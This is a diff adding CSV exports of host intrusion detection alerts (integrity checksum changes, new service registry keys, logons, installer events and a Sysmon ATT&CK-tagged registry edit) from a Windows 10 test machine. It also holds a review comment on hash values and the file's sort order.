+Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '895880f38027cdbcc233f3029d012090' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '2e368782ef2537fa0912cd004316b58bf94aa7df' +" +"Apr 4, 2020 @ 16:44:20.806",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '7245f178c1230e0203988365bc0f6f80' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '780976d4ad4dff40da2ba205e08ea3fb412ea31c' +" +"Apr 4, 2020 @ 16:44:21.088",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'ba12a00cc49fb36d8162dcbe904ef1a8' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '818f9eca9844c709fbfd5213563e7963319d5968' +" +"Apr 4, 2020 @ 16:44:22.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '4de77cf22ac2123ca809e113b4599aab' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'ecad3c82974df73b63be77b70320e046f3aee054' +" +"Apr 4, 2020 @ 16:44:23.198",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : '937eeb04f75827259e28a380e8e57d87' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '012f68fd04a64e99360a4fb6254c06846699e28b' +" +"Apr 4, 2020 @ 16:44:23.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: '98f645d827b038bfbb3a44a8c17a66ff' +New md5sum is : 'e64836a5cef7b9f14a78cf213c877a27' +Old sha1sum was: '2d81f3892a302534ce0115f4db0ffd4ae3651431' +New sha1sum is : '4a2e9bc4ec6b977acc424612a71e8f374e304740' +" +"Apr 4, 2020 @ 16:44:23.259",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 4, 2020 @ 16:44:33.792",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '78c61eb826dd2b5505c3fbb50e2092ce' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : 'f660dc8a035e535ac6be80668730ea227b7331fd' +" +"Apr 4, 2020 @ 16:44:33.807",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'dad18a7bc1523711e11366d62925e95a' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : 'b47613f0586ef95cd590e9399ade1478e383e9f1' +" +"Apr 4, 2020 @ 16:40:18.726",5,"Windows System error event", +"Apr 4, 2020 @ 16:40:24.132",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:40:24.179",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:41:43.161",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:41:54.884",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 4, 2020 @ 16:41:55.122",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:41:55.352",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:43:15.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:15.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:18.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:18.666",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:19.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:19.478",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:43:19.510",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\1' was added. 
+" +"Apr 4, 2020 @ 16:43:19.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 16:43:19.557",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 16:43:19.571",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 16:43:19.587",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:21.899",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:21.915",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:22.015",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:22.025",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:22.243",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:22.259",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:23.864",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:23.885",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a7e6' was added. 
+" +"Apr 4, 2020 @ 16:43:24.072",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:24.089",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:24.666",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:24.697",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:24.993",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:25.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:25.090",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:25.103",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:43:55.791",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:43:55.809",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a7e6\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:43:55.837",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a7e6' was added. 
+" +"Apr 4, 2020 @ 16:44:01.199",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:01.214",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:02.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:02.915",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:03.510",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:03.525",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:19.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:19.478",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:20.338",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:20.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a7e6' was added. +" +"Apr 4, 2020 @ 16:44:30.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a7e6\Security' was added. +" +"Apr 4, 2020 @ 16:44:30.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a7e6' was added. 
+"
+"Apr 4, 2020 @ 16:35:43.951",3,"Windows Logon Success",
+"Apr 4, 2020 @ 16:36:15.359",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 16:36:47.528",3,"Windows Logon Success",
+"Apr 4, 2020 @ 16:36:52.657",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 16:41:39.790",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'."
+"Apr 4, 2020 @ 16:41:42.639",3,"Windows Workstation Logon Success",
+"Apr 4, 2020 @ 16:41:42.665",3,"Windows Workstation Logon Success",
+"Apr 4, 2020 @ 16:41:49.112",3,"The database engine is starting a new instance",
+"Apr 4, 2020 @ 16:41:49.299",3,"The database engine attached a database",
+"Apr 4, 2020 @ 16:41:49.454",3,"Windows Logon Success",
+"Apr 4, 2020 @ 16:41:49.535",3,"The Windows Search Service started",
+"Apr 4, 2020 @ 16:42:00.024",3,"Windows Logon Success",
+"Apr 4, 2020 @ 16:42:20.103",3,"Windows Workstation Logon Success",
+"Apr 4, 2020 @ 16:42:20.134",3,"Windows Workstation Logon Success",
+"Apr 4, 2020 @ 16:42:20.180",3,"Windows User Logoff",
+"Apr 4, 2020 @ 16:42:20.196",3,"Windows User Logoff",
+"Apr 4, 2020 @ 16:42:25.509",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 16:43:10.228",3,"Windows Logon Success",
+"Apr 4, 2020 @ 16:43:37.697",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 16:43:41.463",3,"Windows Logon Success",
+"Apr 4, 2020 @ 16:44:10.369",3,"Software Protection service scheduled successfully",
diff --git a/data/MW_15_HIDS_2.csv b/data/MW_15_HIDS_2.csv
new file mode 100644
index 0000000..e37ac3d
--- /dev/null
+++ b/data/MW_15_HIDS_2.csv
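Review bot: Several `Integrity checksum changed.` rows in `data/MW_15_HIDS_1.csv` carry the value pair `d41d8cd98f00b204e9800998ecf8427e` / `da39a3ee5e6b4b0d3255bfef95601890afd80709` (for example the `HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer` rows at 16:40:27 and 16:42:42), which are the MD5 and SHA-1 of empty input; the agent most likely read the key as empty and then saw it return to its previous hash, so these rows record a transient read/removal rather than modified content and should not be scored as content changes without a note saying so. The file is also not in timestamp order (it runs by descending `rule.level`, then time: the 16:41:48 level-9 row precedes the 16:35:11 level-8 rows) and the `Apr 4, 2020 @ 16:41:48.310` timestamps carry no timezone, so a README or data dictionary for `data/` should state the sort order, the timezone of the exporting console, and that `full_log` is a multi-line quoted field that needs a quote-aware CSV reader. The same empty-input hash pair appears in the hunk above this one, whose start is outside this view.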
@@ -0,0 +1,2154 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 13:26:44.799",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:26:40.999",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:21:38Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:26:11.436",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Licensing Component. Product Version: 16.0.12624.20466. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:10.967",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:26:10.264",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\sppredist.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:26:10.201",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Localization Component. Product Version: 16.0.12624.20442. Product Language: 1033. Manufacturer: Microsoft Corporation. 
Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:10.170",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 13:26:10.107",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:26:09.952",3,"The database engine attached a database",,"""SearchIndexer (6080,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000015:0032:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000198 +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.007471 -0.002063 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:128K # 0K, PF:148K # 0K, P:148K) +[4] 0.000145 +J(0) +[5] - +[6] - +[7] - +[8] 0.002728 -0.001330 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.008197 -0.000507 (5) CM -0.007485 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 136K, P:256K) +[10] 0.000359 -0.000206 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000014 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:26:09.843",3,"The database engine is starting a new instance",,"""SearchIndexer (6080,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:26:09.826",3,"Windows Installer began an installation 
process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rintloc.en-us.16.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:26:09.732",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12624.20442. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:08.014",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:26:07.466",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 13:26:04.983",3,"The Windows Search Service stopped normally",,"""Windows Search Service stopped normally. +""" +"Apr 24, 2020 @ 13:26:04.967",5,"The database engine stopped an instance",,"""SearchIndexer (5760,T,97) Windows: The database engine stopped the instance (0). 
+ +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000013 +J(0) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[2] 0.000028 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.000001 +J(0) +[4] 0.000003 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[5] 0.008366 -0.006186 (5) WT +J(CM:5, PgRf:0, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:88, WS:220K # 0K, PF:0K # 0K, P:0K) +[6] 0.000632 +J(0) +M(C:0K, Fs:3, WS:-608K # 0K, PF:-1220K # 0K, P:-1220K) +[7] 0.000013 +J(0) +[8] 0.006678 -0.004577 (11) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:4096/2) +M(C:0K, Fs:33, WS:-100K # 0K, PF:-168K # 0K, P:-168K) +[9] 0.009439 -0.009395 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:4, WS:16K # 0K, PF:20K # 0K, P:20K) +[10] 0.000006 +J(0) +[11] 0.001641 -0.000709 (2) WT +J(0) +[12] 0.000053 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000294 +J(0) +[14] 0.000025 +J(0) +M(C:0K, Fs:0, WS:-12K # 0K, PF:-32K # 0K, P:-32K) +[15] 0.000007 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K).""" +"Apr 24, 2020 @ 13:26:04.435",3,"Windows installer reconfigured the product",,"""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12624.20442. Product Language: 0. Manufacturer: Microsoft Corporation. 
Reconfiguration success or error status: 0.""" +"Apr 24, 2020 @ 13:26:04.029",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 13:26:02.689",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:25:59.178997400Z"",""eventRecordID"":""2156"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:25:59.169\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ose64\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:25:59.169"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ose64\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:25:59.169 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ose64\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:25:51.842",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:25:51.716",3,"Windows Installer began an installation process",,"""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 4068.""" +"Apr 24, 2020 @ 13:25:51.138",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. 
